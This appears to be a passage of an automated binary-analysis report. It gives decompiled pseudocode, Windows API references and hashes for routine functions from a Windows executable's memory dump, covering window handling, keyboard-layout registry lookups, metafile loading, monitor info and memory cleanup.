API ID: Window$RectThread$AtomCurrentEnumFindFromGlobalIntersectParentPointPropWindows
String ID: !8C$!8C
API String ID: 3421286612-3981046368
Opcode ID: fa676e9786b08c1427f105b91fd90f3a84f7ce8e3d6ce7635a4dde1f47aa7685
Instruction ID: 798546eb7c56af2a3b1aeb67f4081dc1a94d0a7f37d7f63404bf358375647fe5
Opcode Fuzzy Hash: fa676e9786b08c1427f105b91fd90f3a84f7ce8e3d6ce7635a4dde1f47aa7685
Instruction Fuzzy Hash: 19515E71A00209AFCB10DF69C885AAEB7F4AF0C355F14916AF804EB351D738EE01CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004556F8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0045570B
GetWindowRect.USER32 ref: 00455765
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045579D
MessageBoxA.USER32 ref: 004557DE
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,00455854,?,00000000,0045584D), ref: 0045582E
SetActiveWindow.USER32(?,00455854,?,00000000,0045584D), ref: 0045583F

Strings

(, xrefs: 00455742

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Active$MessageRect
String ID: (
API String ID: 3147912190-3887548279
Opcode ID: 86071ab3cd418fe90295ada8eec4073c6ff0ce7f9b3593a1bdcbe78333a3d167
Instruction ID: 3249fed73db876156add03284c31224d4e041a1a3b7d85bcb0d763ef76d8db77
Opcode Fuzzy Hash: 86071ab3cd418fe90295ada8eec4073c6ff0ce7f9b3593a1bdcbe78333a3d167
Instruction Fuzzy Hash: 9F412E75E00208AFDB04DBA9DD91FAE77F9EB48304F144569F904EB392D674AD048B54

Uniqueness

Uniqueness Score: -1.00%

Function 004533EC, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004533EC(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x453597);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x45359e);
					return E00404348( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E004035AC(1);
					E00404348(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00416804( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00440C78( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E004092C8( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x453553);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E004045B0( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E004045B0(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x45355a);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00453597,?,0221094C,?,004535F9,00000000,?,0043812F), ref: 00453442
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004534AA
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00453553,?,80000002,00000000), ref: 004534E4
RegCloseKey.ADVAPI32(?,0045355A,00000000,?,00000100,00000000,00453553,?,80000002,00000000), ref: 0045354D

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00453494
< A, xrefs: 0045341E
layout text, xrefs: 004534DB

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: < A$System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-3335189974
Opcode ID: d9db98ce08ec88b5d9a534e9a83c208b93b06ac879236cd671b150c032ca47fd
Instruction ID: 2e65fdfe55745ceff13be82c6355dd3b97c10b848e3cf1dae755e39760bd7b2c
Opcode Fuzzy Hash: d9db98ce08ec88b5d9a534e9a83c208b93b06ac879236cd671b150c032ca47fd
Instruction Fuzzy Hash: 66415874A00209AFDB11DF95C981B9EB7F8EB48305F5040A6E904E7392E738EF04CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422CBE, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422CBE(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00422B5C(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421844( &_v38) != _v18) {
					E004209F4();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402754(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e2f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004209F4();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004209F4();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422E36);
				return E00402774(_v16);
			}

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D62
MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D7F
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DAB
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DCB
DeleteEnhMetaFile.GDI32(00000016), ref: 00422DEC
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422DFF

Strings

`, xrefs: 00422D47

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: e63a1a3a43b83e3cbd33f10dbe18aee8be931b9a4042a572ded0eb96ca236cb4
Instruction ID: f4c7e7fd51bcff73823d959541a8f6c0f0ac619ab67172c73a204e50a8050bbf
Opcode Fuzzy Hash: e63a1a3a43b83e3cbd33f10dbe18aee8be931b9a4042a572ded0eb96ca236cb4
Instruction Fuzzy Hash: EE414F75E00218AFDB00DFA9D585AAEB7F9EF48700F51846AF404FB241E7789D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422CC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422CC0(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00422B5C(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421844( &_v38) != _v18) {
					E004209F4();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402754(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e2f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004209F4();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004209F4();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422E36);
				return E00402774(_v16);
			}

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D62
MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D7F
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DAB
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DCB
DeleteEnhMetaFile.GDI32(00000016), ref: 00422DEC
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422DFF

Strings

`, xrefs: 00422D47

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: f5807bf5fa57431a72959c85d03c8ee9a922c71f380b6236da7365d442ae4229
Instruction ID: c590c56c1f031b292e49777252285adf31a43198c0916b56b962210586fef7b4
Opcode Fuzzy Hash: f5807bf5fa57431a72959c85d03c8ee9a922c71f380b6236da7365d442ae4229
Instruction Fuzzy Hash: 73414EB5E00218AFDB00DFA9D585AAEB7F9EF48700F51846AF404FB241E7789D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004274C4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004274C4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x492ac8 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					 *0x492aac = E00427194(4, _t23,  *0x492aac, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}

APIs

GetMonitorInfoA.USER32(?,?), ref: 004274F5
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042751C
GetSystemMetrics.USER32 ref: 00427531
GetSystemMetrics.USER32 ref: 0042753C
lstrcpy.KERNEL32(?,DISPLAY), ref: 00427566

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

GetMonitorInfo, xrefs: 004274DC
DISPLAY, xrefs: 0042755D

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: ad86f94aae28ebdc367ced31ca138b3fcb15e76b48007f919251a55fb91822f8
Instruction ID: c05d84078003b73aaf7fe4671f1af9ecff2027ce181741867db3bdfb618d697c
Opcode Fuzzy Hash: ad86f94aae28ebdc367ced31ca138b3fcb15e76b48007f919251a55fb91822f8
Instruction Fuzzy Hash: 3311C3327047217FD720DF62AC80767F7A9AF05750F40493BEC0997B40D3B8A4808BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042766C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0042766C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x492aca != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x492ab4; // 0x42766c
					 *0x492ab4 = E00427194(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x492ab4(_t27, _t29);
				}
				return _t24;
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004276C4
GetSystemMetrics.USER32 ref: 004276D9
GetSystemMetrics.USER32 ref: 004276E4
lstrcpy.KERNEL32(?,DISPLAY), ref: 0042770E

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

lvB, xrefs: 00427689, 00427696, 0042769D
DISPLAY, xrefs: 00427705
GetMonitorInfoW, xrefs: 00427684

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW$lvB
API String ID: 2545840971-4029388103
Opcode ID: 7c3a3995aefbc19850da687c4b1a5e3f410e81b961ca425f3fe60b983d4dc96e
Instruction ID: c18707be004a8e06ee07ba6e8d4ffe71520b8a8fc7dafdccaf32e8c0190fd5f7
Opcode Fuzzy Hash: 7c3a3995aefbc19850da687c4b1a5e3f410e81b961ca425f3fe60b983d4dc96e
Instruction Fuzzy Hash: D2110332704720AFD720CF61AD457A7B7E9EB85354F40483BEC4997691E3B4B804CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401B64, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401B64() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4925bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push("�1!");
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x492049 != 0) {
						_push(0x4925c4);
						L004013FC();
					}
					 *0x4925bc = 0;
					_t3 =  *0x49261c; // 0x781d98
					LocalFree(_t3);
					 *0x49261c = 0;
					_t19 =  *0x4925e4; // 0x7833cc
					while(_t19 != 0x4925e4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401464(0x4925e4);
					E00401464(0x4925f4);
					E00401464(0x492620);
					_t14 =  *0x4925dc; // 0x782d98
					while(_t14 != 0) {
						 *0x4925dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4925dc; // 0x782d98
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c41);
					if( *0x492049 != 0) {
						_push(0x4925c4);
						L00401404();
					}
					_push(0x4925c4);
					L0040140C();
					return 0;
				}
			}

APIs

RtlEnterCriticalSection.KERNEL32(004925C4,00000000,1!), ref: 00401B91
LocalFree.KERNEL32(00781D98,00000000,1!), ref: 00401BA3
VirtualFree.KERNEL32(?,00000000,00008000,00781D98,00000000,1!), ref: 00401BC2
LocalFree.KERNEL32(00782D98,?,00000000,00008000,00781D98,00000000,1!), ref: 00401C01
RtlLeaveCriticalSection.KERNEL32(004925C4,00401C41,00781D98,00000000,1!), ref: 00401C2A
RtlDeleteCriticalSection.KERNEL32(004925C4,00401C41,00781D98,00000000,1!), ref: 00401C34

Strings

1!, xrefs: 00401B78

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: 1!
API String ID: 3782394904-1845855088
Opcode ID: 0dc971edaac5e3fa23cc0fe98fdc44acbf7b818b47f1c9225f4ab5b1a7a832e9
Instruction ID: 8791097a756066d2a2b1b9dd3d3da6b1873c49361a0662bae4c8a8f8b36b9a23
Opcode Fuzzy Hash: 0dc971edaac5e3fa23cc0fe98fdc44acbf7b818b47f1c9225f4ab5b1a7a832e9
Instruction Fuzzy Hash: C911E2706487807FEB15EB669EA1F167B95A314718F05803BF004A66F2D6FC9C44CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00452234, Relevance: 12.1, APIs: 8, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00452234(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x4524c4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E004343D4();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x491070; // 0x41d530
					E00406548(_t50,  &_v36);
					E0040A158(_v36, 1);
					E00403DA8();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x476b4c; // 0x0
				_v20 = _t58;
				_t59 =  *0x492c08; // 0x221094c
				_t60 =  *0x492c08; // 0x221094c
				E00414238( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x492c08; // 0x221094c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x492c08; // 0x221094c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x492c08; // 0x221094c
				E0045369C(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x492c08; // 0x221094c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044C628(0, 0x492c04, _t122, _t123);
				_push(_t125);
				_push(0x4524a4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E00452184(_v8);
				_push(_t125);
				_push(0x452403);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043C1F4(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E004553D4( *0x492c04, _t122, _t123);
					if( *((char*)( *0x492c04 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E004520E4(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043C1F4(_v8), 0xb001, 0, 0);
				_t88 = E0043C1F4(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x45240a);
				return E0045217C();
			}

APIs

GetCapture.USER32 ref: 004522AA
GetCapture.USER32 ref: 004522B9
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004522BF
ReleaseCapture.USER32(00000000,004524C4), ref: 004522C4
GetActiveWindow.USER32 ref: 004522D3
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00452369
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004523D0
GetActiveWindow.USER32 ref: 004523DF

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: e02ba57b4dad0587dab1b0976f2b4cbb701eef1c5534605c4be55da5e4fc5d9a
Instruction ID: 2d5935f5de0abf565ba2167de1f7639af11b1845c3466f7d6f9300908871c47e
Opcode Fuzzy Hash: e02ba57b4dad0587dab1b0976f2b4cbb701eef1c5534605c4be55da5e4fc5d9a
Instruction Fuzzy Hash: 6E510134A00244EFDB10EF6AC985B5D77F5AF49704F1580BAF804AB3A2D7B8AD44DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043A2D0, Relevance: 12.1, APIs: 8, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043A2D0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
